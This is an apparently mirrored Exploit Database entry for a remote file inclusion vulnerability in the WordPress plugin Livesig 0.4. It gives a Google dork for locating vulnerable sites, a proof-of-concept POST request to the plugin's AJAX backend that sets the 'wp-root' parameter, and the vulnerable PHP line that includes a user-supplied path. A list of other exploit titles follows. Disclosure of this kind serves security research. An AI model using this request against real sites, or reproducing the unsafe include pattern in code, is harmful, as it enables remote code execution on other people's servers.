WordPress Plugin Livesig 0.4 – Remote File Inclusion

Exploit Database
33 阅读

作者： Ben Schmidt

日期： 2011-09-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17864/

# Exploit Title: Livesig WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/livesig
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/livesig/download/
# Version: 0.4 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/livesig/livesig-ajax-backend.php POST="wp-root=RFI&action=asdf"

---
Vulnerable Code
---
// Exit if no function specified
if( !isset( $_POST['action'] ) || '' == $_POST['action'] ) {
echo '{ errcode: "ERR-000", errmsg: "No action specified" }';
exit();
}

include( $_POST['wp-root'] . 'wp-config.php' );

last Exploits
WordPress Plugin Livesig 0.4 – Remote File Inclusion的更多信息

Car or Cab Booking Script – Authentication Bypass：
Boonex Dolphin 7.4.2 – ‘width’ Stored XSS：
SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation：
4Images 1.7.7 – ‘image_utils.php’ Remote Command Execution：
WordPress Plugin SH Slideshow 3.1.4 – SQL Injection：
Joomla! Component redSHOP 1.0 – Local File Inclusion：
phpDealerLocator – Multiple SQL Injections：
BGSvetionik BGS CMS – ‘search’ Cross-Site Scripting：